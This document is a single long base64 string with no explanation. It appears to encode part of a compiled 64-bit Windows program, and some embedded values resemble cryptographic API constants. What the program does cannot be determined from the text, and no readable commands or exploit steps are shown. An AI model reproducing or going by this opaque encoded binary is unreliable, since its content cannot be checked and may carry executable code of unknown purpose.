8j/Fbf1AgCFwHQbTItHCItVUEiLTCQw/xdIi0wkMIvY/xUQ+gIASIvO/xUH+gIASItsJEBIi3QkSIlfEIvDSItcJDhIg8QgX8PMQFNIg+wgixJJi9hNi0AI/xOJQxBIg8QgW8PMzEiJXCQQSIlsJBhWV0FUQVZBV0iD7CBMi+JIY9kz7Y1VEkiNDbiTBADoX7r//41NAejbAAAAM/9Mi/uF2w+OqwAAAIt0JFCB/RUAAEAPhJsAAABJixT8SI0NC5YEAOgquv//TYs0/E2F9nR0RTPAM9JJi87/FZf5AgCL6IXAdGCL1blAAAAASAPS/xUB+QIASIvYSIXAdEhEi8VIi9BJi87/FWr5AgA76HQMSIvL/xXl+AIASIvYSIXbdCRmgzshdApIi8voGwEAAOsJSI1LAugQqQAASIvLi/D/Fbn4AgBI/8eL7kk7/w+MWf///zPJ6BwAAABIi1wkWEiLbCRgM8BIg8QgQV9BXkFcX17DzMzMSIlcJAhIiXQkEEiJfCQYQVZIg+wgi/mFyXQsTI0F3q0GAEiNFd+tBgBIjQ3UrQYA/xWi+wIAgSXArQYA/z8AALgoAAAA6wW4MAAAAExj8EiNHXr3AwC+EgAAAEiLA0mLDAZIhcl0L//RhcB5KUyLA0iNDRmVBACF/02LAEiNFR2VBABEi8hID0XRSI0NH5UEAOjmuP//SIPDCEj/znW8hf91GUiLDWaZBgBIhcl0BeggvgEASIMlVJkGAABIi1wkMEiLdCQ4SIt8JEAzwEiDxCBBXsNIi8RIiVgIVVZXQVRBVUFWQVdIg+wwM+1IjVAYi92JnCSIAAAA/xWR+QIAi/VEi+VEi/WJbCR4TIv4SIlEJChIhcAPhNoCAAA5rCSAAAAAD47NAgAASIsISI0VyZQEAOjgwgEASIvYSIXAdF1Ii9CNTUBJKxdI0fpIjRRVAgAAAP8VJvcCAEiL8EiFwHQ2SYsXTIvDTCvCSIPJ/0j/wWY5LEp190mNQARI0fiLwEg7wXMETI1jBEnR+EiLzk0DwOhIgQIAD7fd6wVNiyeL3UG9EgAAAEiNPSH2AwBBjUXvZkE73Q+DugAAAEiF9nQjD7fTSIvOSIsU10iLEugEsQEAhcC4AQAAAHQIRIv16YYAAABEi/BNheR0foN8JHgAdXVED7frSosU72Y7ahhzYUiLUiAPt8VJi8xIjQRASIlEJCBIi1TCCOi5sAEAM8mFwA+UwYlMJHiFyXQpSosE74uMJIAAAABJjVcITItAIEiLRCQg/8lB/xTAi0wkeImEJIgAAAC4AQAAAGYD6IXJdJVBvRIAAAAz7WYD2EWF9g+EPP///0WF9nVrSI0NjZMEAEiL1ujxtv//SIsXSI0N45MEAEiLEujftv//SIsHSItQCEiF0nQMSI0N2JMEAOjHtv//SIsHSItQEEiF0nQMSI0N0JMEAOivtv//SIPHCEn/zXW1SI0NexUEAOiatv//6fEAAAA5bCR4D4XnAAAAuP//AABIjQ2zkwQASYvUZgPYD7frTIsE702LAOhqtv//SIsU70iNDRuUBABIixLoV7b//0iLBO9FM+RIi1AISIXSdAxIjQ0clAQA6Du2//9IiwTvSItQEEiF0nQMSI0NI5QEAOgitv//SI0N9xQEAOgWtv//SIsM70UPt/RmRDthGHNVQb8BAAAASItRIEEPt8ZIjQ3ukgQASI0cQEiLVNoI6OS1//9IiwTvSItIIEiLVNkQSIXSdAxIjQ3XkgQA6Ma1//9IiwzvZkUD92ZEO3EYcrZMi3wkKEiNDYcUBADoprX//zPtSIX2dAlIi87/FaL0AgBJi8//FZn0AgCLnCSIAAAAi8NIi1wkcEiDxDBBX0FeQV1BXF9eXcPMzMxAU0iD7CCDZCQ4AEiNVCQ4/xVq9gIASIvYSIXAdEBIgyXilQYAALr/AAAAuUAAAABIiRW5lQYA/xUz9AIASIkFtJUGAEiFwHQMi0wkOEiL0+iL+v//SIvL/xUa9AIASIsFk5UGAEiDxCBbw8xIiXQkCFVXQVZIi+xIg+xwSINlMABIg2QkIABMjU04TI0FopYEAEiL8kSL8ejP9P//hcAPhDcBAABIi004TI1F8EiNVfjoGpX//4XAD4QKAQAASItN+OgBcf//SIv4SIXAD4TpAAAASIvQM8not3L//0iDZCRIAItV8EiLTfhIjUXgTI1FMEiJRCRASI1F6EWLzkiJRCQ4g2QkMABIg2QkKABIiXQkIOj0EAAAhcAPhJQAAABIi1UwSIXSdBZIjQ0QlgQA6De0//9Ii00w/xU58wIASINkJCAATI1NOEyNBRiWBABIi9ZBi87oEfT//4XAdCdEi0XgSItV6EiLTTjoBJP//4XAdDZIi1U4SI0N8ZUEAOjos///6yRIjQ0blgQA6Nqz//+LVeBIi03o6Ibt//9IjQ2jEgQA6MKz//9Ii03o/xXE8gIASIvP6GBx//9Ii034/xWy8gIA6xT/FdryAgBIjQ3rlQQAi9DokLP//zPASIu0JJAAAABIg8RwQV5fXcPMSIlcJAhVVldBVEFVQVZBV0iNbCTZSIHskAAAAEUz/0yNTf9MjQU2lgQAQY1HAkiL8kSL8YlFC0iNBQqWBABEiX3XTIl930yJfXfHRQcYAAAASIlFF0iJRCQgTIl9D+gZ8///TI1Nd0yNBQKWBABIi9ZBi85MiXwkIOj+8v//TI1Nf0yNBf+VBABIi9ZBi85MiXwkIOjj8v//SIPP/4XAdCVIi01/SIvHSP/AZkQ5PEF19olF16gBdQ1MjUXXSI1V3+gi7///TI0Fy5UEAEUzyUiL1kGLzkyJfCQg6Jzy//+5BAAAAEGL34XATI0FR2AEAEiL1g9F2UUzyUGLzkyJfCQg6HXy//+FwHQED7rrHUyNBZKVBABFM8lIi9ZBi85MiXwkIOhT8v//TI0FiJUEAEiL1vfYSI1FB0GLzk0b7UUzyUyJfCQgTCPo6C3y//9Ii1X/hcBBvAEAAABIjQ1elQQAQY1EJAFED0Xg6Ayy//9Ii0V3SIXASI0V8g4EAEiNDcuTBABID0XQ6O6x//9IjQ1TlQQA6OKx//9IjT0fWwMAi8NBi8/T6KgBdA9IixdIjQ26XgQA6MGx//9B/8dIg8cIQYP/CHLZSMfH/////w+64x1zE0iNFVxfBABIjQ2NXgQA6JSx//9IjQ1pEAQA6Iix//9IjQ0NlQQA6Hyx//9FM/9Nhe10CUGLTQTos4///0iNDUAQBADoX7H//0iNDQSVBADoU7H//4tV10iLTd9FM8DoVO7//0iNDdlMBADoOLH//0iLRf9I/8dmRDk8eHX2SItVd40EfQIAAABMjUXXiUX3SI1F50iNTfdIiUQkMEUzyYlcJChMiWwkIP8V3ewCAIXAD4StAAAASItN7+hEbf//SIvYSIXAdBJIi9Azyej+bv//SIvL6H5u//9IjQ2jDwQA6MKw//9MjU13TI0Fs5IEAEiL1kGLzkyJfCQg6Kfw//+FwHQnRItF50iLVe9Ii0136JqP//+FwHQ+SItVd0iNDYeSBADofrD//+ssSI0NQZQEAOhwsP//i1XnSItN70EPuuwURYvE6Gzt//9IjQ0xDwQA6FCw//9Ii03v/xVS7wIA6xT/FXrvAgBIjQ0blAQAi9DoMLD//0iLTd9Ihcl0Bv8VLe8CADPASIucJNAAAABIgcSQAAAAQV9BXkFdQVxfXl3DSIlUJBCJTCQIVVNWV0FUQVVBVkFXSI1sJOFIgezIAAAARTP/TI0FLZQEAEUzyUiL2ov5RYvnTIl990WL70yJff9Fi/dBi/dMiX2XTIl9B0yJfa9MiX3vTIl910yJfd9MiX2fTIl8JCDol+///0yNTZeJRX8zwEyNBU+RBABIi9OLz0iJRCQg6Hjv//+FwA+E9QcAAEiLXZdMjUV3SI1V50iLy+jAj///hcAPhOUHAABIi03n6J9z//9Ii/hIhcAPhLgHAABIi9Doz3X//0GNV0zHRcdMAEwAjUr0/xUn7gIASIlFz0iFwHRpQY1Pe0GNV31miQhIi0XPDxBHDA8RQAIPEE8cDxFIEg8QRywPEUAiDxBPPA8RSDLyDxBHTPIPEUBCD7dNx0iLRc9I0elmiVRI/kiNVbdIjU3H/xUP8QIAM8lIi03PhcBBD5nH/xW97QIASItVb4tNZzPATI1NB0yNBQmTBABIiUQkIOiT7v//hcB0QkiLTQdIjVWn/xVl6QIAhcB0GkiLTadIjVWf/xUz6QIASItNp/8Vce0CAOsn/xWZ7QIASI0NypIEAIvQ6E+u///rEUiF23QMSI1Vn0iLy+jwGQAASItVb4tNZ0ghdCQgTI1N70yNBRmTBADoIO7//0iDy/8z0oXAdDJIi03vTIvzSf/GZkI5FHF19kSJdXdB9sYBdRdMjUV3SI1V9+ha6v//TItl90SLdXcz0otNZ0iJVCQgSItVb0yNTddMjQWJWwQA6Mjt//8zyYXAdDBIi03XM8BI/8NmOQRZdfdIi/OJXXf2wwF1FEyNRXdIjVX/6Afq//9Mi23/i3V3M8lIOY+AAAAAD4TJAwAASDlPYA+EvwMAAEiLl5AAAABIhdJ0E0iDwgQzyejcEQAASIvYSIXAdSJIi02fSIXJD4S4AAAAM9LowBEAADPJSIvYSIXAD4SlAAAASI0NN5IEAOgurf//SIvL6AYVAAD2R1wEdAz2QxACdBBIjVNo6w72QxABSI1TQHUESItVd0iF0nReSIuPgAAAAEiNRXdMjU2XQbgUAAAASIlEJCDoOoP//zPJhcB0R0iLl5AAAABIhdJ0DEiDwgRIi8vo+BEAAESLRXdIi1WXQYvH99hIjUW3SBvJRTPJSCPI6MENAADrDEiNDfCRBADol6z//zPJ9kdcAg+EMgEAAE2F7Q+ExgIAAIX2D4S+AgAAg/4si9m4BAAAAA9E2Cvzg/4oD4W5AAAASI0NL5IEAOhWrP//SQPdRTPASIvLi9boVun//0iNDRsLBADoOqz//0iLj4AAAABIjUV3vhQAAABMjU2XSIvTRIvGSIlEJCDoboL//4XAdDBIjQ1PkgQA6Aas//9Ei0V3SItVl0GLx/fYSI1Ft0gbyUUzyUgjyOgDDQAA6SYCAABIi4+AAAAASI1Fd0iNUxRMjU2XRIvGSIlEJCDoGoL//4XAdAlIjQ0bkgQA66pIjQ0ykgQA6egBAABIjQ3WkgQA6J2r//9JA91FM8BIi8uL1uid6P//SI0NYgoEAOiBq///SIuPgAAAAEiNRXdMjU2XRIvGSIvTSIlEJCDouoH//4XAdKnpU////0g5TZ8PhJMBAABIi1VvSIlMJCCLTWdMjU2vTI0FtJIEAOgz6///SItdr4XAD4SrAAAAi3V/SI0FcY8EAEyNBaqSBACF9kiNDbGSBABIi9NMD0XA6AGr//9Mi02fSIuXgAAAAItPXEiNRXdMi8NIiUQkMEiNRZdIiUQkKIl0JCDoOX///zPJhcB0R0iLh5AAAABIjVAESIXAdQKL0UiLTZ9FM8lFM8BIiVwkKOjBEQAARItFd0iLVZdBi8f32EiNRbdIG8lFM8lII8jopgsAAOsMSI0NhZIEAOh8qv//TYXkD4S3AAAASI0NEJMEAOhnqv//RTPAQYvWSYvM6Gnn//9Bg/4QdQlIjQ0okwQA6xRIjQ0/kwQAQYP+FHQHSI0NUpMEAOgxqv//TItNn0iLj4AAAABIjUV3RYvGSYvUSIlEJChIjUWXSIlEJCDo4X///zPJhcB0O0iLh5AAAABIjVAESIXAdQKL0UyLyUGD/hRMi8FIi02fTQ9EzEGD/hBND0TESIlcJCjo5RAAAOnC/f//SI0N9ZIEAOi8qf//SIuPmAAAADPbSIXJD4TwAQAASDlfeA+E5gEAAEiLHe1JBgBIjRXmSQYASDvadBlIi0EMSDtDEHUKSItBFEg7Qxh0CUiLG+viM8mL2UiF2w+EqgAAAEiNDTSTBADoW6n//0iLy+g3EwAAi3MkSItbKEyLt5gAAABIjU1/QbkYAAAARTPAM9LHRCQgAAAA8P8VpOICAIXAdDFIjUV/TI1Nl0SLxkiJRCQwSI1Fp0iL00iJRCQoSI1Fd0mLzkiJRCQg6AeC//8z2+sEM9uLw4XAdCJMi02nRItFd0iLVZdBi8f32EiNRbdIG8lII8jo5wkAAOsMSI0N5pIEAOi9qP//SItVb4tNZ0yNTd9MjQVnkwQASIlcJCDooej//4XAD4TfAAAASI0NVpMEAOiNqP//SItN30yNRX9IjVWv6OCI//+FwA+EugAAAEiLXa9Mi7eYAAAASI1Nf4tzFEG5GAAAAEUzwDPSx0QkIAAAAPD/FcXhAgAzyYXAdDBIjUV/SI1TGEyNTZdIiUQkMEiNRadEi8ZIiUQkKEiNRXdJi85IiUQkIOglgf//6wKLwYXAdD5Ii4+YAAAARItDFEiNUxhIg8EMQbkBAAAA6LsQAABMi02nRItFd0iLVZdB999IjUW3SBvJSCPI6O0IAADrDEiNDeyRBADow6f//0iLy/8VxuYCAEiLTZ9Ihcl0Bv8Vt+YCAE2F5HQJSYvM/xWp5gIATYXtdAlJi83/FZvmAgBIi8/oZ23//0iLTef/FYnmAgDrDEiNDYiSBADob6f//zPASIHEyAAAAEFfQV5BXUFcX15bXcPMSIlcJAhVVldBVEFVQVZBV0iNbCTZSIHswAAAAEUz5EyNTc9MjQX2iAQASIvyRIvxTIllz0yJZcdMiWWvTIll10yJZX9MiWWnQYv8RYv8TIlkJCDoAOf//4XAD4RsAwAASItNz0yNRXdIjVW/6EuH//+FwA+EXwMAAItVd0iLTb/oX2///0iL2EiFwA+EWgIAAEiL0Oi3cP//TI1Nx0yNBSCLBABIi9ZBi85MiWQkIOik5v//hcB0LEiLTcdIjVWn/xV24QIAhcB0BkiLfafrFP8VvuUCAEiNDR+SBACL0Oh0pv//TI1N10yNBeWNBABIi9ZBi85MiWQkIOhZ5v//TItt14XAdC5Ig8j/SP/AZkU5ZEUAdfVEjQQATI1N30mL1bkEgAAAx0QkIBQAAADoBU///+tQTI1Nr0yNBTySBABIi9ZBi85MiWQkIOgI5v//hcB0NEiLTa9Ig8j/SP/AZkQ5JEF19kiD+ChFi8xBD5TBRYXJdBJIjVXfQbgUAAAA6Nvh//9Ei/hMjXMESIX/dRFEOWMgdAtIi0MYSIsISIt5REGL9EiF/w+E3wAAAE1j50Uz/ztzIA+DzQAAAEiNVX9Ii8//FVLgAgCFwA+EmwAAAEmL1jPJ6PQJAABIi/hIhcB1F0iLTX8z0ujhCQAASIv4SIXAD4T/AAAA9kcQAg+E9QAAAEiNDYCRBACL1uhFpf//SIvP6B0NAABIi0sYSI1F90SL/kiNV2hMjU2vSosM+UiJRCQg6CyB//+FwHQgSYvWSIvP6EEKAABIi0sYTI1F90qLDPlIjVWv6AgHAABFM/9Ii01//xX34wIASItDGIvO/8ZIixTISIt6REyNcgRIhf8PhSr///9FM+RIi02nSIXJdAb/FcjjAgBBi/xEOWMgdj1Ii0MYi89IizTISIX2dCdIi05ESIXJdAb/FaHjAgBIi05MSIXJdAb/FZLjAgBIi87/FYnjAgD/xzt7IHLDSIvL/xV54wIASItNv/8Vb+MCAOneAAAATYXkD4Rg////SI0N0pAEAIvW6Eek//9FM8BIjU3fQY14FIvX6EXh//9IjQ0KAwQA6Cmk//9Mi01/SIPI/0j/wGZFOTxBdfZIjU0PjQRFAgAAAIl8JDBIiUwkKEiNVd9Ei8e5BIAAAIlEJCDoplH//4XAD4Tx/v//SItLGEiNRfeL/kiLDPlMjU2vSI1VD0iJRCQg6NZ///+FwA+Eyf7//0iLTX9MjU3fRTPASYvWTIlsJCjovgoAAEiLSxhMjUX3SIsM+UiNVa/ooQUAAOmX/v//SI0NWZAEAOiAo///M8BIi5wkAAEAAEiBxMAAAABBX0FeQV1BXF9eXcPMzMxIi8RIiVggTIlAGIlQEEiJSAhVVldBVEFVQVZBV0iNaMFIgeywAAAATIttZzPbRYv5SI0F9IUEAEyNBYWQBABEi/NJi9VFM8lBi8+JXcdIiV3fx0XnGAAAAMdF6wsAAABIiV3vSIlF94v7SIldv0SL40iJXc+L80yJdddIiVwkIOjb4v//TI1Nt0yNBdSBBABJi9VBi8+JRctIiVwkIOi94v//SIPL/zPShcB0L0iLTbdIi/NI/8ZmORRxdfeJdbdA9sYBdRZMjUW3SI1Vv+j53v//SIt9v4t1tzPSSIlUJCBMjU3fTI0F8IkEAEmL1UGLz+hp4v//TCFkJCBMjU2/TI0FZYUEAEmL1UGLz+hO4v//M9KFwHQ1SItNv0j/w2Y5FFl190yL80iJXdeJXbf2wwF1GUyNRbdIjVXP6Ive//9Ei3W3TItlz0yJdddMjQU4hQQAM9tFM8lJi9VBi89IiVwkIOj34f//SI1N50yNBQiFBAD32EmL1UiJXCQgSBvARTPJSCPBQYvPSIlFz+jN4f//jUsEhcBEi+tED0XpSItNR0SJbbfoEF7//0UzwEiLyEiJRb9IhcAPhIECAABIix3OQQYASI0Vx0EGAOsXSItBGEg7QxB1CkiLQSBIO0MYdAtIixtIO9p15EmL2EiF23UTSIX/dASF9nUKRDlFyw+ENQIAAEiLlY8AAABIhdJ0D0iNDet5BADoQqH//0UzwEiF23QXSI0Nr44EAOguof//SIvL6EIFAABFM8BIhf90KEiNDbuOBADoEqH//0UzwIvWSIvP6BXe//9IjQ3a/wMA6Pmg//9FM8BMi33PTYX/dCZIjQ2yjgQA6OGg//9Bi08E6CB///9IjQ2t/wMA6Myg//9FM8DrCEGDzQFEiW23TYXkdClIjQ2njgQA6K6g//9FM8BBi9ZJi8zosN3//0iNDXX/AwDolKD//0UzwEyLbd9Nhe10EkiNDZ2OBABJi9XoeaD//0UzwESLfXdMi3VvSIXbdHlNhfZ0CEGLz0WF/3UDi03XTYX2dAhNi85Fhf91A02LzItVT0yJbCRYx0QkUBQAAABIjUMgSIudhwAAAEiJRCRISItFf0iJXCRASIlEJDhEiUQkMEyJRCQoTItFV4lMJCBIi01H6Mxy//9FM8CJRceFwA+FvQAAAOsHSIudhwAAAEiF/3QEhfZ1CkQ5RcsPhKEAAABNhfZ0CkWF/3QFQYvH6wRIi0XXTYX2dAVFhf91A02L9EiLTX9Mi0VXi1VPTIlsJFiJdCRQSIl8JEhIiVwkQEiJTCQ4i023iUwkMEiLTc9Ni85IiUwkKEiLTUeJRCQg6D9y//+JRceFwHQeSIX/dDKF9nQuSItNv0SLxkiL10iDwRjoUAIAAOsZSIX/dRT/FX/eAgBIjQ2QjQQAi9DoNZ///0iNDQr+AwDoKZ///0iLTb/o0Fz//02F5HQJSYvM/xUe3gIASIX/dAlIi8//FRDeAgCLRcdIi5wkCAEAAEiBxLAAAABBX0FeQV1BXF9eXcPMzEiJXCQISIlsJBBIiXQkGFdIg+xQSIvxSI0Nqo0EAEmL+UGL2EiL6ui4nv//RTPAi9NIi83ou9v//0iNDYD9AwDon57//0yNTCQwRIvDSIvVuQSAAADHRCQgFAAAAOhiR///hcB0QUiNDXONBADocp7//0UzwEiNTCQwQY1QFOhx2///SI0NNv0DAOhVnv//SIX2dBNIjVQkMEG4FAAAAEiLzug9AQAASIvN/xVA3QIASIX/dClIjQ08jQQA6COe//9Ii8/o39z//0iNDfD8AwDoD57//0iLz/8VEt0CAEiLXCRgSItsJGhIi3QkcEiDxFBfw8xIiVwkEEiJbCQYSIl0JCBXSIPsMEiL2UiNDf6MBABJi/hIi/Lox53//0iLS0Togtz//0iNDeuMBADosp3//0iNSwToOdz//0iNDX78AwDonZ3//0iNDdqMBADokZ3//0UzwEiLzkGNUBDoktr//0iNDVf8AwDodp3//0iNDcuMBADoap3//0UzwEiLz0GNUBToa9r//0iNDTD8AwDoT53//0iLS0RIjVQkQP8VBNgCAIXAdCVIi0wkQEiDZCQoAEiNUwRMi89Mi8boOgQAAEiLTCRA/xUj3AIASItcJEhIi2wkUEiLdCRYSIPEMF/DzMxIi8RIiVgISIloEEiJcBhIiXggQVZIg+xQM9tBi/hIi+pIi/FIhckPhMUAAABIhdIPhLwAAABFhcAPhLMAAABMiwXuPAYATI015zwGAOsWSIsBSTtAEHUKSItBCEk7QBh0C02LAE07xnXlTIvDTYXAD4WIAAAAg/8UdBpMjUwkMESLx7kEgAAAx0QkIBQAAADoS0X//7o4AAAAjUoI/xVh2wIASIvISIXAdFMPEAaD/xS7AQAAAPMPf0AQSI1EJDBID0TFDxAADxFBIItAEIlBMEiLBWQ8BgBMiTFIiUEISIsFVjwGAEiJCEiJDUw8BgDrDEiNDXuLBADoApz//0iLbCRoSIt0JHBIi3wkeIvDSItcJGBIg8RQQV7DzEiFyXRWU0iD7CBIi9lIjQ28iwQA6Mub//9IjUsQ6FLa//9IjQ2ziwQA6Lab//9IjQ2riwQA6Kqb//9FM8BIjUsgQY1QFOiq2P//SI0Nb/oDAOiOm///SIPEIFvDSIlcJAhIiXQkEEiJfCQYQVdIg+wgSIsdsDsGAEiL+kiL8UyNPaM7BgBJO990dEiF9nQVSItTKEiLzuillAEAhcB1BY1IAesCM8lIhf90I/dDEAAAAIB0GkiLB0g7QxR1EUiLRwhIO0McdQe4AQAAAOsCM8BIhfZ0G0iF/3QEhcnrFYXJdBf3QxAAAACAdQ5Ii8PrEEiF/3QEhcB18kiLG+uHM8BIi1wkMEiLdCQ4SIt8JEBIg8QgQV/DzMxIg+w4RTPSTIvZSIXJdEFIhdJ0PESLQRBFhcB4M0GLwEiDwVRMiVQkKCQC9thJjUMwTRvJQYDgAUwjyUmLSyhB9thNG8BMI8DolwEAAESL0EGLwkiDxDjDSIlcJBBIiWwkGFZXQVRBVkFXSIPsQEUz5E2L+UiL2UiFyQ+ERAEAAEiLQShIg8//TIv3Sf/GZkY5JHB19otBELkAAACARQP2hcF1EkiF0nQNDxACC8GJQxDzD39DFEiLtCSYAAAASIX2dA5I/8dmRDkkfnX2A//rBIt8JHD2QxABdXBNhcB1JkiF9nRmSI1rMESLx0iL1rkCgAAATIvNx0QkIBAAAADoqEL//+sNQQ8QAEiNazDzD39FAEyLSyhBjU4CSI1DQMdEJDAUAAAASIlEJCiJTCQguQSAAABBuBAAAABIi9XoQUf//4XAdASDSxAB9kMQAnVzTYX/dSZIhfZ0aUiNa1REi8dIi9a5BIAAAEyLzcdEJCAUAAAA6DJC///rE0EPEAdIjWtUDxFFAEGLRxCJRRBMjUtox0QkMBQAAABFjVYCTIlMJChMi0soQbgUAAAASIvVuQSAAABEiVQkIOjERv//g0sQAkyNXCRAuAEAAABJi1s4SYtrQEmL40FfQV5BXF9ew8zMSIlcJAhIiWwkEEiJdCQYV0FWQVdIg+wwM/9Ni/FNi/hIi+pIi/FIhcl0dOgw/f//SIvYSIXAdUiNT0C6oAAAAP8VptcCAEiL2EiFwHRdSIvO6M6QAQBIiUMoSIsF0zgGAEiJQwhIjQXAOAYASIkDSIsFvjgGAEiJGEiJHbQ4BgBIi0QkeE2Lzk2Lx0iL1UiLy0iJRCQo6Nn9//+L+OsMSI0NVogEAOg9mP//SItcJFBIi2wkWEiLdCRgi8dIg8QwQV9BXl/DzMxIhckPhOIAAABTSIPsIEiLUShIi9lIhdJ0DEiNDXOIBADo+pf//0iNDeuHBADo7pf///dDEAAAAIB0FUiNDcqHBADo2Zf//0iNSxToYNb//0iNDcGHBADoxJf///ZDEAF0HEiNDTuIBADospf//0UzwEiNSzBBjVAQ6LLU//9IjQ2ThwQA6JaX///2QxACdBxIjQ0diAQA6ISX//9FM8BIjUtUQY1QFOiE1P//SI0NZYcEAOhol///9kMQBHQcSI0N/4cEAOhWl///RTPASI1LfEGNUBDoVtT//0iNDRv2AwDoOpf//0iDxCBbw0iLxEiJWAhIiWgQSIlwGEiJeCBBVEFWQVdIg+wgM9tFi/lBi+hMi/JIi/FIhckPhLQAAABIhdIPhKsAAABFhcAPhKIAAABMiwU7NwYATI0lNDcGAOsWSIsBSTtAEHUKSItBCEk7QBh0C02LAE07xHXlTIvDTYXAdXtBjVAwjUoQ/xWy1QIASIv4SIXAdGYPEAZIi9W5QAAAAESJeCDzD39AEP8VkNUCAEiJRyhIhcB0FkyLxUmL1kiLyOjZXwIAiW8kuwEAAABIiwXCNgYATIknSIlHCEiLBbQ2BgBIiThIiT2qNgYA6wxIjQ35hgQA6ECW//9Ii2wkSEiLdCRQSIt8JFiLw0iLXCRASIPEIEFfQV5BXMPMzMxIhcl0RFNIg+wgSIvZSI0N9IUEAOgDlv//SI1LEOiK1P//g3sgAEiNBROHBABIjRUUhwQASI0NHYcEAEgPRdDo2JX//0iDxCBbw8zMSIlcJAhIiXQkEFdIg+wgSIsd/jUGAEiNNfc1BgBIO950NEiLQwhIiztIiThIixNIi0MISIlCCEiLSyhIhcl0BeiHjQEASIvL/xWO1AIASIvfSDv+dcxIiw2nNQYASI09oDUGAEg7z3QjSItBCEiLGUiJGEiLEUiLQQhIiUII/xVY1AIASIvLSDvfdd1Iix2RNQYASI01ijUGAEg73nQ1SItDCEiLO0iJOEiLE0iLQwhIiUIISItLKEiFyXQG/xUZ1AIASIvL/xUQ1AIASIvfSDv+dctIi1wkMEiLdCQ4M8BIg8QgX8PMzEiJXCQIV0iD7CBIjQ0rhgQA6NKU//9Iix0PNQYASI09CDUGAOsLSIvL6Jr8//9IixtIO9918EiNDU+GBADoppT//0iLHdM0BgBIjT3MNAYA6wtIi8voqvj//0iLG0g733XwSI0Nc4YEAOh6lP//SIsdxzQGAEiNPcA0BgDrC0iLy+hG/v//SIsbSDvfdfAzwEiLXCQwSIPEIF/DzEiJXCQISIlsJBBIiXQkIFdIg+wgM+1Ii/KL3ehojAEASIv4SIXAdGyNVVxIi8jo2ZkBAEiFwHRUjVVcSIvPZoko6MaZAQBIhcB0QUiNSAJIjVQkQP8V1s4CAIXAdC5Ii0wkQEiL1v8VpM4CAIvYhcB0D0iLFkiNDRSGBADoy5P//0iLTCRA/xXM0gIASIvP6LSLAQBIi2wkOEiLdCRIi8NIi1wkMEiDxCBfw8xIi8RIiVgISIloEFZXQVZIg+xgSINgqABMjUjYTI0FRXUEAEiL6kSL8ehy0///hcAPhKcBAABIi0wkUEyNhCSQAAAASI1UJFjot3P//4XAD4RyAQAASIt8JFhIi0cESCsFbzwDAHULSItHDEgrBWo8AwAz20iFwEiNdwwPlMOF20gPRfczyUiL1uiKVP//i5QkkAAAAIXbdQOLVwRIjQ2RhQQASI0F0oUEAIXbSA9FwUWLzkUzwEiJRCRISI2EJJgAAABIi85IiUQkQEiNhCSQAAAASIlEJDiDZCQwAEiDZCQoAEiJbCQg6FPv//+FwA+ExwAAAEiLtCSQAAAASIvOhdt0JugjLP//SIvYSIXAD4SeAAAASIvQ6KMu//9Ii8vozy3//+mJAAAA6NEl//9Ii9hIhcB0fEiL0OgJJ///SItLNEiFyXQG/xVe0QIASItLWEiFyXQG/xVP0QIASItLTEiFyXQG/xVA0QIASItLQEiFyXQG/xUx0QIASItLZEiFyXQG/xUi0QIASItLcEiFyXQG/xUT0QIASItLeEiFyXQIi1Mk6Coq//9Ii8v/FfnQAgBIi87/FfDQAgBIi8//FefQAgDrIv8VD9ECAEiNDeCEBACL0OjFkf//6wxIjQ1QhQQA6LeR//9MjVwkYDPASYtbIEmLayhJi+NBXl9ew0iJXCQIVVZXQVRBVUFWQVdIjWwk2UiB7LAAAABMjU3HTI0FzXEEAEUz/0iL2ovxTIl8JCDoZ9H//4XAD4S4AwAASItNx0yNRX9IjVXP6LJx//+FwA+EiQMAAEiLTc/o/TL//0iL+EiFwA+EaAMAAEiL0Oh5Nf//TI1N30yNBTKFBABIi9OLzkyJfCQg6A/R//+FwA+ENgMAAEiLTd9MjUV/SI1Vx+hacf//hcAPhAkDAABIi03H6NEv//9Mi/BIhcAPhOgCAABIi9DohTD//0mLTjBIjQXqhAQAi1EgSItJJEiJRCRISI1F90SLzkUzwEiJRCRASI1Ff0iJRCQ4RIl8JDBMiXwkKEiJXCQg6C7t//+FwA+EXAIAAEyLbX9Bg30AJHIWRYtFAEiNVf9IjU3fTYvN6GMx///rA0GLx4XAD4QnAgAASI0Nr4QEAOhOkP//RTPASI1N30GNUBDoTs3//0iNDRPvAwDoMpD//0iNDaeEBADoJpD//0UzwEiNTf9BjVAg6CbN//9IjQ2rKwQA6AqQ//9IjU3XQbkYAAAARTPAM9LHRCQgAAAA8P8VackCAIXAD4SyAQAARYvnRDl/PA+GmQEAAEiLR0BBi8xIixzISIXbD4R4AQAAixNIjQ1XhAQA6LaP//9MOXsUD4RUAQAAi0MQiUV3hcAPhEYBAACL0LlAAAAA/xWVzgIASIvwSIXAD4QtAQAARItFd0iLUxRIi8jo2VgCAEiLVddIjUV/SIlEJChIjUXvTI1N/0yNRd9Ii8tIiUQkIOjTAQAAhcAPhOYAAABIi03vRTPJSI1Fd0iJRCQoRY1BATPSSIl0JCD/FQrJAgCFwA+EqQAAAEQ5fX90E4tVd0UzwEiLzugazP//6aQAAABIjQ3a7QMA6PmO//9EOTt0GIM7ZHQTi1V3QbgBABAASIvO6O7L///rWUiLzuioNf//SIvYSIXAdElIi9DoWDb//0w5ewx0MoN7BAB2H0iLQwxBi89IiwzISIXJdAb/Fa7NAgBB/8dEO3sEcuFIi0sM/xWbzQIARTP/SIvL/xWPzQIASI0NWO0DAOh3jv//6xT/FavNAgBIjQ0sgwQAi9DoYY7//0iLzv8VZM0CAEiNDS3tAwDoTI7//0H/xEQ7ZzwPgmf+//9Ii03XM9L/FcfHAgBJi83/FTbNAgBJi04YSIXJdAb/FSfNAgBJi14wSIXbdBhIi0skSIXJdAb/FQ/NAgBIi8v/FQbNAgBJi87/Ff3MAgBIi03H/xXzzAIA6xT/FRvNAgBIjQ0MgwQAi9Do0Y3//0iLz+hlMf//SItNz/8Vy8wCAOsi/xXzzAIASI0NdIMEAIvQ6KmN///rDEiNDfSDBADom43//zPASIucJPAAAABIgcSwAAAAQV9BXkFdQVxfXl3DzMxIiVwkEEiJdCQYV0iD7ECLAU2L0EUzwP/ITIvaSIv5g/hiSItEJHjHRCRQAQAAAEEPlsBEiQBFhcB0DboOZgAAQbkQAAAA6w5Ni9G6EGYAAEG5IAAAAEiDZCQwAEiLXCRwTYvCSYvLSIlcJCiDZCQgAOh+N///i/CFwHQ0SIsLRTPJTI1EJFBBjVEE/xVvxgIAg38cAHQZTItHIE2FwHQQSIsLRTPJQY1RAf8VUMYCAEiLXCRYi8ZIi3QkYEiDxEBfw8zMSIlcJAhVVldBVEFVQVZBV0iL7EiD7HBIg2QkIABMjU3oTI0FWG4EAEyL+kSL4eiFzP//hcAPhJoDAAB